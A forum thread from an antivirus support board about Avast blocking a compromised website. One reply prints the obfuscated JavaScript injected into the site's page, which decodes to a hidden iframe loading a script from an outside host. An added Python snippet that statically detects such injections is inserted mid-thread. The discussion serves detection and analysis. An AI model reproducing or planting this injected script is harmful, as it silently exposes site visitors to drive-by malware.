Possible False Positive VBS:Malware-Gen

I am new to Avast, and since switching, I can no longer log into “www .uk-bug.net/index.php”
Could someone check and see if this is indeed a problem?
Thanks.

Lee


Welcome to the forums, Leebme.

I had no trouble getting to that webpage.

What firewall are you using and have you allowed avast through the firewall?


The Avast webshield alerts me to the same threat posted by the OP, about halfway through loading the page, and aborts the connection. I don’t know if there is actually anything malware-ish on the page, though. Lots of sponsored ads. Attempting to navigate anywhere through the site produces the same warning.

Dr. Web says it’s clean…
But nowadays, I trust more in avast (on scanning encrypted webpages scripts) than Dr. Web.
Anyway, the generic detection could be due to an avast false positive indeed…

File index.php was injected with obfuscated javascript. Script is injected before end tag BODY on line 817.

Well… My guesses are correct


Hmmm … I just went to that website again and still get no warnings from avast even though the site is fully loaded.

Anyone got any ideas why I get no warnings?

EDIT :

ScanDoo finds nothing wrong with the site.


It alerts for me using Firefox. What browser are you using, and is the web shield even scanning its content?

I wouldn’t expect scandoo to find anything in a case like this; it just sees a script tag and doesn’t go to the depths that avast does in scanning content.


<script type="text/javascript">
function BFD6F5DD5DB451E605DC93C1C(F856A149343E267113D4743C9CC)
{var BABAC8D053646DAAEED97=16;
return(parseInt(F856A149343E267113D4743C9CC,BABAC8D053646DAAEED97));}#
function EDC04E5FA7431499C99(AF1EAFAE6DA9EFFC64209858078EBFBC)
{function FDB6EFBD03C6DE29(){var A22AFFBCBE863863A1B64DF=2;
return A22AFFBCBE863863A1B64DF;}var A01766E6154626B4="";
for(E846AAB0F24560E5FDD=0;
E846AAB0F24560E5FDD<AF1EAFAE6DA9EFFC64209858078EBFBC.length;
E846AAB0F24560E5FDD+=FDB6EFBD03C6DE29()){A01766E6154626B4+=
(String.fromCharCode(BFD6F5DD5DB451E605DC93C1C(AF1EAFAE6DA9EFFC64209858078EBFBC.
substr(E846AAB0F24560E5FDD,FDB6EFBD03C6DE29()))));}document.write(A01766E6154626B4);}
EDC04E5FA7431499C99("3C696672616D65207372633D22687474703A2F2F7878786D6F76696573
2E6469702E6A702F31352F6A735F676F5F66312E706870222077696474683D31206865696768743
D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A616273
6F6C757465223E3C2F696672616D653E");
</script>

I have broken the single line of code so it doesn’t stretch for miles.

I doubt that they would look at this and think, like avast’s scan does, that this is suspect based on the obfuscation in the javascript.
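The kind of content-level check discussed in the post above, as an added example that is not part of the original thread or of any scanner named in it: it decodes long hex string literals inside script blocks statically, without executing anything, and flags a decoded hidden iframe. The function names, the sample page and the placeholder iframe target are constructed for illustration.

```python
import re

# Markers of the decoder idiom in the posted script: hex parsing, char building, DOM write.
DECODER_HINTS = ("parseInt", "fromCharCode", "document.write")
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# Quoted run of 40+ hex digits; whitespace allowed because pasted samples get line-wrapped.
HEX_LITERAL_RE = re.compile(r"""["']((?:[0-9A-Fa-f]\s*){40,})["']""")
HIDDEN_IFRAME_RE = re.compile(
    r"<iframe\b[^>]*(?:visibility\s*:\s*hidden|display\s*:\s*none"
    r"|(?:width|height)\s*=\s*[\"']?[01]\b)", re.I)

def decode_hex_literals(script_body):
    """Statically decode long hex string literals; nothing is executed."""
    decoded = []
    for match in HEX_LITERAL_RE.finditer(script_body):
        digits = re.sub(r"\s+", "", match.group(1))
        if len(digits) % 2:  # an odd digit count is not a whole number of bytes
            continue
        decoded.append(bytes.fromhex(digits).decode("latin-1"))
    return decoded

def scan_html(html):
    """Return one finding per hex literal found inside a script block."""
    findings = []
    for number, match in enumerate(SCRIPT_RE.finditer(html), start=1):
        body = match.group(1)
        hints = [h for h in DECODER_HINTS if h in body]
        for text in decode_hex_literals(body):
            findings.append({
                "script": number,
                "line": html.count("\n", 0, match.start()) + 1,
                "decoder_hints": hints,
                "decoded": text,
                "hidden_iframe": bool(HIDDEN_IFRAME_RE.search(text)),
            })
    return findings

# Constructed sample: one benign script and one script using the same idiom.
# The iframe target is a placeholder, not the URL from the thread.
PAYLOAD = ('<iframe src="http://placeholder.invalid/x.php" width=1 height=1 '
           'style="visibility:hidden"></iframe>')
SAMPLE_HTML = (
    "<html><body>\n<p>forum index</p>\n<script>var menu = 'open';</script>\n"
    "<script type=\"text/javascript\">function d(s){var o='';"
    "for(var i=0;i<s.length;i+=2){o+=String.fromCharCode(parseInt(s.substr(i,2),16));}"
    "document.write(o);}\n"
    'd("' + PAYLOAD.encode("ascii").hex().upper() + '");</script>\n</body></html>')

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(finding)
```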


Opera 9.52 … and Webshield is running.


Thanks for the reply. I am using Comodo Firewall and Avast is allowed thru the firewall. My browser is IE-6. I know, an old browser but works great.
So far, this is the only site which I am having a problem with.

Lee

Yes and the reason for the problem, a hacked/infected site blocked by avast, so not a problem as such, but a good save by avast.

It looks like the site is still infected and avast isn’t the only AV to think so, 7/36 think something smells, http://www.virustotal.com/analisis/5607b119f09a146c9410acf814097fe1. Whilst most of the detections are generic or heuristic, based on what has been stated above I believe it is still a good detection.

So it looks like the site owner is unaware of this.

Will someone there notify them as such? I am not sure what my options are now. I guess just not go there for a while in hopes that they will correct the problem.

Thanks again.

Lee

You’re welcome.

I’m just an avast user like yourself, you could try and email to something like webmaster (at) the website domain name.com if it is somewhere you regularly visit.